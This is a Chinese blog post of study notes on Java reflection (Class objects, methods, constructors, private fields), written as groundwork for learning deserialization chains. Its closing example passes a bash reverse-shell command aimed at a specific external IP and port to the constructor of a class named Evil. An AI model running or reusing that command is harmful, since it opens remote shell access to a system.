本文写于2024-11-14 ,最后修改于2025-3-17
java反射
写在前面
最近花了很长的时间去学习java,前后把Java se ,Java web,spring boot都搞了一遍(还搞了个springboot项目当练手): Bilibili-Film-Area-top-webcrawler。现在终于有心回来搞安全了
最近打算开始学链子的内容,从反射开始一步一步走。反正考完数电无事可做,就当是消磨时间了
举例
例子:
public class testForName {
public static void main(String args[]) throws ClassNotFoundException, NoSuchMethodException {
Class c = Class.forName("student");
Class c1 = new student(2,"wm").getClass();
Class c2 = student.class;
//c,c1,c2指向同一个Class对象
System.out.println(c2.getMethod("getName"));
Class c3 = c.getSuperclass();
System.out.println(c3.getMethod("getJob"));
}
}
class person{
private String job = "工人";
public String getJob() {
return job;
}
public void setJob(String job) {
this.job = job;
}
}
class student extends person{
private int id = 0;
private String name = "mak";
public int getId() {
return id;
}
public String getName() {
return name;
}
public student(int id, String name) {
this.id = id;
this.name = name;
}
public void setId(int id) {
this.id = id;
}
@Override
public String toString() {
return "student{" +
"id=" + id +
", name='" + name + '\'' +
'}';
}
}
获取Class对象:
1.通过类名
Class c = Class.forName("student");
Class.forName(“类名”) 即后文的student类
2.通过实例
Class c1 = new student(2,"wm").getClass();
这里是通过Object的getClass方法获得一个对象对应的类的Class对象。大概意思就是通过一个实例化之后的对象找到对应的class对象,有点绕
3.通过类名.class
Class c2 = student.class;
和第一种方法差不多,如果有新的理解我再补充
获取对象中的方法:
System.out.println(c2.getMethod("getName"))
通过getMethod方法获取 student 类中的 getName 方法。
获取父类的方法
Class c3 = c.getSuperclass();
System.out.println(c3.getMethod("getJob"));
c.getSuperclass()意思是获取 student 的父类 Class 对象,这里是 person 类。 通过getMethod方法在 person 类中获得 getJob 方法。
操作对象
接下来以这个类来举例
class student {
private int id = 0;
private String name = "mak";
public int getId() {
return id;
}
public String getName() {
return name;
}
public student(int id, String name) {
this.id = id;
this.name = name;
}
public void setName(String name) {
this.name = name;
}
public void setId(int id) {
this.id = id;
}
void test(String name){
System.out.println("hello,"+this.name+" and "+name);
}
@Override
public String toString() {
return "student{" +
"id=" + id +
", name='" + name + '\'' +
'}';
}
}
通过反射创造对象:
Class stuclass = Class.forName("student");
student stu = (student)stuclass.newInstance();
首先是获取 student 类的 Class 对象,这个在前面有讲,不在叙述。 student stu = (student)stuclass.newInstance(); 这句话的目的其实是创建一个student类的一个名叫stu实例。 stuclass.newInstance()会通过 student 类的无参构造函数来创建一个 student 类的对象。这里要求 student 类必须有一个无参构造函数。而newInstance() 返回一个 Object 类型,所以需要进行类型转换 (student),将返回的对象强制转换为 student 类型。
通过反射创造带参构造器的对象:
Constructor constr = stuclass.getConstructor(int.class,String.class); //获取类的构造器,参数:构造器参数类型的class
student stu1 = (student) constr.newInstance(12,"Tom");
stuclass.getConstructor(int.class, String.class) 用于获取 student 类中接受 int 和 String 两个参数的构造函数。
这里对应了例子中的:
public student(int id, String name) {
this.id = id;
this.name = name;
}
关于Constructor 对象:
Constructor 对象是 Java 反射机制中的一部分,用于表示类的构造函数。它的存在是为了提供一种方式,允许程序在运行时动态地访问和使用构造函数创建对象实例。与 Method 对象(用于表示普通方法)类似,Constructor 对象专门负责构造函数的管理。
执行对象方法
Method stname = stuclass.getMethod("setName", String.class); //获取类的方法,参数:方法名,方法参数类型的Class
stname.invoke(stu1,"wm"); //invoke(激活):执行函数,参数:(用于执行函数的对象,函数参数)
Method hello = stuclass.getDeclaredMethod("test", String.class);
hello.invoke(stu1,"abc");
stuclass.getMethod(“setName”, String.class):从 stuclass(即 student 类的 Class 对象)中获取 setName 方法。 getMethod() 的第一个参数是方法名,第二个参数是方法的参数类型
stname.invoke(stu1, “wm”):通过反射调用 stname 方法,即调用 stu1 对象的 setName 方法,并传入参数 “wm”。
hello方法同理,不在叙述
操作对象属性
Field stuid = stuclass.getDeclaredField("name");
stuid.setAccessible(true); //对于修改private属性,要先关闭程序安全检测(默认为true)
stuid.set(stu1,"wm1111"); //set修改,参数:要修改属性的对象,修改后的值
hello.invoke(stu1,"def");
通过反射来访问并修改 student 类的私有属性 name,然后再次调用 test 方法
stuclass.getDeclaredField(“name”):从 stuclass(即 student 类的 Class 对象)中获取 name 字段(即属性)
关于set方法:
set() 方法不是 Class 类,而是 Field 类 的方法。Field 类在 java.lang.reflect 包中,用于表示类的属性(字段)。通过 Field 对象的 set() 方法,可以为特定对象的字段设置值。
写在后面
唉,体测
补充于2025.3.15
关于获取构造方法和构造方法
什么是构造方法?
在编程语言中,构造方法(Constructor)是一种特殊的成员方法,用于在创建对象时初始化对象的状态。构造方法的名称与类名相同,并且没有返回值(甚至不能声明为 void )。构造方法的主要作用是为对象分配内存并初始化对象的属性。
public class Person {
private String name;
private int age;
// 无参构造方法
public Person() {
this.name = "Unknown";
this.age = 0;
}
// 带参构造方法
public Person(String name, int age) {
this.name = name;
this.age = age;
}
不加显示声明的构造方法
class Evil {
private String cmd;
// 包级私有构造方法
Evil(String cmd) {
this.cmd = cmd;
}
}
访问范围:只有同一包内的类可以访问该构造方法。
应用场景:这种访问权限通常用于库开发或内部实现,限制类的实例化只能在特定的包内进行。
反射调用构造方法
使用反射调用构造方法又两种方式:
Constructor constr = stuclass.getConstructor(int.class,String.class); //获取类的构造器,参数:构造器参数类型的class
student stu1 = (student) constr.newInstance(12,"Tom");
Constructor constr = stuclass.getDeclaredConstructor(int.class,String.class); //获取类的构造器,参数:构造器参数类型的class
student stu1 = (student) constr.newInstance(12,"Tom");
区别在于:
getConstructor :
该方法用于获取类的公共(public)构造函数。
它只返回那些可以被外部访问的构造函数。
如果没有找到匹配的公共构造函数,会抛出 NoSuchMethodException 。
getDeclaredConstructor
该方法用于获取类的所有构造函数,包括私有(private)、受保护(protected)和包私有(package-private)的构造函数。
它可以返回类中定义的所有构造函数,无论它们的访问权限如何。
如果没有找到匹配的构造函数,也会抛出 NoSuchMethodException 。
示例:
//使用反射访问构造方法
Class evilClass = Class.forName("Evil");
Constructor<?> constructor = evilClass.getDeclaredConstructor(String.class);
Evil Evilcon = (Evil)constructor.newInstance("bash -i >& /dev/tcp/107.174.159.179/23172 0>&1");
//原构造方法
......
Evil(String cmd) {
this.cmd = cmd;
}